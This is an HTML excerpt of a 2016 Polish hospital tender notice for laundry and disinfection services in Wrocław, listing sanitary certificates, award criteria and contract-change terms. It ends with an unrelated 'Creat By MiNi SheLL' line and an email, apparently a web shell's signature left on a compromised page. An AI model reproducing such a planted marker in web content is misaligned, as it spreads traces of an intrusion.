<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane usługi będące przedmiotem niniejszego zamówienia odpowiadają wymaganiom określonym przez Zamawiającego Wykonawca musi złożyć następujące dokumenty:
1. Zamawiający uzna, że Wykonawca spełnia wymagania dotyczące oferowanej usługi jeśli przedłoży razem z ofertą:
1) aktualne (obowiązujące na dzień składania ofert) zaświadczenie (opinię)  Państwowej Inspekcji Sanitarnej właściwej dla miejsca wykonania usługi prania zgłoszonej do wykonania usługi o dopuszczeniu pralni, w której będzie wykonywania usługa prania i dezynfekcji, doświadczenia usług dla szpitali i posiadaniu bariery higienicznej;
2) opis technologii prania, prasowania, oraz sposobu transportu czystej 
i brudnej odzieży roboczej personelu oraz opis technologii prania, dezynfekcji i sposobu znakowania bielizny szpitalnej, koców, poduszek, kołder i materacy;
3) przedstawienie wdrożonego planu higieny pralni, w której będzie świadczona usługa prania;
4) oświadczenie potwierdzające dopuszczenie do stosowania i obrotu na terenie RP, zgodnie z obowiązującymi przepisami prawa, stosowanych w pralni Wykonawcy preparatów piorących i dezynfekujących;
5) wykaz certyfikatów i świadectw dopuszczenia stosowanych w pralni Wykonawcy preparatów piorących i dezynfekujących; 
6) oświadczenie, że Wykonawca usługi ma dostęp do narzędzi, wyposażenia zakładu 
i urządzeń technicznych, które umożliwiają zrealizowanie przedmiotu zamówienia;
7) aktualne (obowiązujące na dzień składania ofert) zaświadczenie Państwowej Inspekcji Sanitarnej właściwej terenowo dla pralni zgłoszonej do wykonania usługi 
o spełnieniu warunków sanitarnych środków transportu zewnętrznego będących 
w posiadaniu Wykonawcy - wraz z numerami rejestracyjnymi samochodów dopuszczonych do transportu czystej i brudnej bielizny szpitalnej; środki transportu przeznaczone do wykonania usługi transportu zewnętrznego bielizny czystej i brudnej winny być przystosowane do przewozu kontenerów (wózków) stojących (wieszaków na ubrania);
8) dokumenty wydane przez Państwową Inspekcję Sanitarną lub inny podmiot 
upoważniony do przeprowadzania kontroli sanitarnych, tj.: udokumentowanie przeprowadzania systematycznych kontroli sanitarnych wykonywanych dotychczas usług poprzez załączenie do oferty opinii i zaświadczeń za 2015rok. Ww. dokumenty powinny zawierać faktycznie realizowane badania w zakresie:
a/ czystość mikrobiologiczna bielizny szpitalnej i odzieży roboczej personelu - min. 2 badania na12m-cy, 
b/ czystość mikrobiologiczna wózków używanych w pralni - min. 2 badania na 12m-cy,
c/ czystość mikrobiologiczna powierzchni płaskich i regałów w pralni - min. 2 badania na12 m-cy,
d/ czystość mikrobiologiczna materacy-dezynfekcja komorowa (lub inny proces zapewniający właściwe pranie i dezynfekcję materacy - min. 2 badania na12m-cy,
e/ dwa ostatnie protokoły kompleksowej kontroli sanitarnej pralni zgłoszonej do wykonania usługi przeprowadzonej przez Sanepid,
f/ oświadczenie o przeszkoleniu załogi z zakresu przestrzegania procedur 
postępowania z bielizną szpitalną,
g/ oświadczenie, że Wykonawca wykonywać będzie usługę spełniającą wymogi stosownych norm, ustaw i rozporządzeń, zwłaszcza resortu Ministerstwa Zdrowia, a w szczególności zgodnie z ustawą z dnia 05.12.2008r. o zapobieganiu oraz zwalczaniu zakażeń i chorób zakaźnych u ludzi (TJ Dz.U. z 2013r. poz. 947 z późniejszymi zmianami) oraz Rozporządzenia Ministra Gospodarki z dnia 27.04.2000r. w sprawie bezpieczeństwa  i higieny pracy w pralniach i farbiarniach (Dz.U. Nr 40, poz. 469);
9) certyfikat o wdrożeniu w pralni, w której będzie świadczona usługa procedur ujętych w Normie PN-14065 wydanego przez firmę posiadającą uprawnienia do prac wdrożeniowych lub certyfikacyjnych.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Jakość - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający dopuszcza zmianę umowy w następujących przypadkach:
a/ obniżenia cen w stosunku do cen oferowanych przez Wykonawcę,
b/ ustawowej zmiany stawki podatku VAT; w takim przypadku cena netto nie ulegnie zmianie, a cena brutto ulegnie zmianie w wysokości i w terminie wynikającym z aktu prawnego wprowadzającego nowa ustawę; zmiana ceny w tym przypadku podpisana w drodze pisemnego aneksu przez strony umowy,
c/ zmiany danych Zamawiającego lub Wykonawcy (nazwy, siedziby, nr ewidencyjnego NIP, REGON, formy prawnej, itp.),
d/ działania siły wyższej lub wystąpienia stanu wyższej konieczności,
e/ zmiany treści załączników do umowy przy zapewnieniu ich tożsamości z opisem Zamawiającego 
i parametrów chemicznych oraz jakościowych,
f/ nie wykorzystania ilości określonych w załączniku nr 1 do umowy, Zamawiający może przedłużyć termin obowiązywania umowy, o którym mowa w ust. 1 niniejszego punktu, nie więcej niż o 4 miesiące.
2. Ponadto Zamawiający dopuszcza także zmianę umowy w zakresie:
a/ rodzaju i ilości bielizny szpitalnej,
b/ zmiany w zakresie ilości asortymentu własnego lub ograniczenia zakresu zamówienia przy zachowaniu wartości całej umowy i zmniejszeniu wynagrodzenia miesięcznego,
3. Wszelkie zmiany umowy mogą być wprowadzone za zgodą obu stron w drodze pisemnego aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Specjalistyczny im. J. Gromkowskiego z siedzibą we Wrocławiu, 
ul. Koszarowa 5, 51 - 149 Wrocław, Sekcja Umów i Zamówień Publicznych , Budynek J, pokój nr 15, I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.05.2016 godzina 09:00, miejsce: Wojewódzki Szpital Specjalistyczny im. J. Gromkowskiego z siedzibą we Wrocławiu, 
ul. Koszarowa 5, 51 - 149 Wrocław, Sekcja Umów i Zamówień Publicznych, Budynek J, pokój nr 15, I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com